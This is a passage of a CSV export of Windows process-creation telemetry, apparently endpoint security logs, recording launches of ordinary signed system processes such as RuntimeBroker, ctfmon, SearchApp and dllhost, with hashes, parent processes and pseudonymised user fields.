20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,,,,,,
+664,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:15.114409600+00:00,14388,RuntimeBroker.exe,RuntimeBroker.exe -Embedding,PortableExecutable,2021-02-17 04:34:50.954376500+00:00,C:\Windows\System32\RuntimeBroker.exe,103288,ba4cfe6461afa1004c52f19c8f2169dc,e86870769ee6c797e09457bd99c58d9bf2303cf0193a24ef9b1222c2c3daf628,ab8539ef6b2a93ff9589dec4b34a0257b6296c92,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.176302900+00:00,2021-06-24 00:53:26.870985700+00:00,2df962a5-70e4-4d44-b542-ddb76bebb2be,computerpii_0a470890c60768167990033d701e7bd881398861,167934,False,10.7740.19041.1052,False,11540474045136908,,11540474045175138,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,RuntimeBroker.exe,RuntimeBroker.exe,Runtime Broker
+665,False,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:15.162317200+00:00,18596,ctfmon.exe,"""ctfmon.exe""",PortableExecutable,2019-12-07 09:09:00.614545300+00:00,C:\Windows\System32\ctfmon.exe,11264,b625c18e177d5beb5a6f6432ccf46fb3,484fed5f039f429ed933931ba607b7efda7d1a343d79cfab60910e1843147012,abb864e1911c59f785b0e1822701b9a5ab31ba1e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:24.766622300+00:00,5244,svchost.exe,svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.178538700+00:00,2021-06-24 00:53:26.871068500+00:00,539ee822-5a86-4b9e-a224-731e1035974e,computerpii_0a470890c60768167990033d701e7bd881398861,167935,False,10.7740.19041.1052,False,11540474045137061,,11540474045175139,2021-06-10 00:47:24.766622300+00:00,5244,2021-06-10 00:47:24.766622300+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,5244,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,CTFMON,CTFMON.EXE,CTF Loader
+666,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:15.292541500+00:00,19820,RtkAudUService64.exe,"""RtkAudUService64.exe"" -admin",PortableExecutable,2021-06-11 09:11:41.196395400+00:00,C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137\RtkAudUService64.exe,1256824,2805aa081ca8451e6d459d246c15bce9,9e659b1f529bed5111714ec4bb4cf3c055e69240438eee7b6e88226ba3146407,0efd918c6e662d4a43c13ef133eadd4ce0ae9061,2805aa081ca8451e6d459d246c15bce9,9e659b1f529bed5111714ec4bb4cf3c055e69240438eee7b6e88226ba3146407,0efd918c6e662d4a43c13ef133eadd4ce0ae9061,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-11 09:11:42.134433900+00:00,1612,RtkAudUService64.exe,"""RtkAudUService64.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.335505900+00:00,2021-06-24 00:53:26.871318100+00:00,eea53929-b419-4b82-bd0f-4de7d6e4469f,computerpii_0a470890c60768167990033d701e7bd881398861,167938,False,10.7740.19041.1052,False,11540474045143160,,11540474045175140,2021-06-11 09:11:42.134433900+00:00,1612,2021-06-11 09:11:42.134433900+00:00,\Device\HarddiskVolume3\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137\RtkAudUService64.exe,1612,128,ActiveProcessStartkey,C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137,1256824,2021-03-23 10:50:48+00:00,2021-03-25 16:18:38+00:00,2021-06-11 09:11:42.153121700+00:00,2021-06-11 09:11:41.196395400+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Realtek Semiconductor,Realtek HD Audio Universal Service,1.0.370.2,RtkAudUService.exe,RtkAudUService.exe,Realtek HD Audio Universal Service,Realtek Semiconductor,Realtek HD Audio Universal Service,1.0.370.2,RtkAudUService.exe,RtkAudUService.exe,Realtek HD Audio Universal Service
+667,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:15.319169100+00:00,18652,SearchApp.exe,"""SearchApp.exe"" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca",PortableExecutable,2021-06-09 01:21:18.392649+00:00,C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe,3403576,a2e28a0b40a5fb362b6b33612b76e8af,24f4282c6898dd4b85d4fafa52014362cbeff81f1ea433f2ba44717f2d6f1656,16928c207ee10878bc788a21e512df5fd6b6a826,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.388367900+00:00,2021-06-24 00:53:26.871402200+00:00,85cbc9ac-c642-45b9-9658-e4f797e33a54,computerpii_0a470890c60768167990033d701e7bd881398861,167939,False,10.7740.19041.1052,False,11540474045136908,,11540474045175141,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,SearchApp,SearchApp.exe,Search application
+668,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:52:15.519738100+00:00,19948,unsecapp.exe,unsecapp.exe -Embedding,PortableExecutable,2021-03-11 01:06:22.261015700+00:00,C:\Windows\System32\wbem\unsecapp.exe,54272,febc95f4364aba305bd60d308bd722d7,0396209e22db36cf3eca0d00406f7e7d926aba6d753c1aef2dd37ddbf208d864,4a7498f74454b90412ebe3f7a4d2a7de29d5e5fe,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.625061100+00:00,2021-06-24 00:53:26.872091600+00:00,8b6274cc-1cf6-420a-8b42-6464e9320d4d,computerpii_0a470890c60768167990033d701e7bd881398861,167948,False,10.7740.19041.1052,False,11540474045136908,,11540474045175142,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,unsecapp.dll,unsecapp.dll,Sink to receive asynchronous callbacks for WMI client application
+669,True,High,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeFull,NotWeb,2021-06-24 00:52:15.572358600+00:00,12984,ClipRenew.exe,ClipRenew.exe,PortableExecutable,2019-12-07 09:10:06.398428700+00:00,C:\Windows\System32\ClipRenew.exe,152080,f9c43c85cb2068df7deb1c9d58046400,f6e6f9043a1ddb2028d7960e9269e174acbb54242099b0f6160e081dfbf564ce,f4ee9279f964e7349cde354b91e2440ccc226c7f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.687888200+00:00,2021-06-24 00:53:26.872505100+00:00,b68f72dd-ec0e-41f0-b6c7-fb6a7ac4cde9,computerpii_0a470890c60768167990033d701e7bd881398861,167954,False,10.7740.19041.1052,False,11540474045136925,,11540474045175144,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,Acquire License From Store,ClipRenew.exe,Acquire License From Store
+670,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:15.607430200+00:00,6844,dllhost.exe,DllHost.exe /Processid:{D4872B74-3AFC-47CD-B8A2-9E4F998539BC},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:15.692530800+00:00,2021-06-24 00:53:26.872602800+00:00,ea528b97-7b24-4465-a61a-a4ad7b82cd90,computerpii_0a470890c60768167990033d701e7bd881398861,167956,False,10.7740.19041.1052,False,11540474045136908,,11540474045175145,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+671,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:15.814054500+00:00,17116,YourPhone.exe,"""YourPhone.exe"" -ServerName:App.AppX9yct9q388jvt4h7y0gn06smzkxcsnt8m.mca",PortableExecutable,2021-06-16 00:47:46.639551300+00:00,C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21042.143.0_x64__8wekyb3d8bbwe\YourPhone.exe,24064,a6339f04b2d3b5e39e8d64bbbe3c4b1c,395769c3aadc7df7f0547fdb4956f0d785f12c14f0b22d1fe26b43333dd0d1ec,232b7bc743e2454f1afe53338395fa4efcac4989,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:16.016096800+00:00,2021-06-24 00:53:26.872701+00:00,e574e8ac-db64-4c02-8b76-ddf06f6548bb,computerpii_0a470890c60768167990033d701e7bd881398861,167958,False,10.7740.19041.1052,False,11540474045136908,,11540474045175146,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Your Phone,1.21042.143.0,YourPhone.exe,YourPhone.exe,YourPhone
+672,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:16.308741200+00:00,6168,TextInputHost.exe,"""TextInputHost.exe"" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca",PortableExecutable,2021-05-12 01:12:54.242611100+00:00,C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe,18168,aabf7ef96b7c99430e0247fbb91971c1,791202d8da61bf6527eb8008dd16297da1c64cc01bedcefccb5fd4004493cacf,52ca501ee6a099600fafd092f38f434a9fbf2b49,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:16.374083100+00:00,2021-06-24 00:53:26.872974700+00:00,2339dd7a-28fc-4b94-b192-6ca818f19c64,computerpii_0a470890c60768167990033d701e7bd881398861,167964,False,10.7740.19041.1052,False,11540474045136908,,11540474045175149,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,2001.22012.0.2020,TextInputHost.exe,TextInputHost.exe,
+673,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:19.124967300+00:00,20676,mobsync.exe,mobsync.exe -Embedding,PortableExecutable,2019-12-07 09:09:47.490502500+00:00,C:\Windows\System32\mobsync.exe,99328,5990b373978022822c91c1b997b859aa,6e83030a6a3e447acb1d38cc07035c1fd5bd2c9e136a57ce99f3ac1be45a7d3d,e65d0219e0e0c7b564d7cc71a11f145a1ee7e358,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:19.160959800+00:00,2021-06-24 00:53:26.874670800+00:00,40fbb374-bede-40ac-95f8-e4d62b2d49f2,computerpii_0a470890c60768167990033d701e7bd881398861,167999,False,10.7740.19041.1052,False,11540474045136908,,11540474045175153,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,mobsync.exe,mobsync.exe,Microsoft Sync Center
+674,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:19.564906200+00:00,14308,dllhost.exe,DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:19.633774800+00:00,2021-06-24 00:53:26.874815200+00:00,654c8656-9c32-4dda-a241-4a7fc34227cd,computerpii_0a470890c60768167990033d701e7bd881398861,168002,False,10.7740.19041.1052,False,11540474045136908,,11540474045175154,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+675,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:19.627918500+00:00,18616,dllhost.exe,DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:19.889771800+00:00,2021-06-24 00:53:26.875009500+00:00,d6585034-e599-4866-8304-626399bd02ea,computerpii_0a470890c60768167990033d701e7bd881398861,168006,False,10.7740.19041.1052,False,11540474045136908,,11540474045175156,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
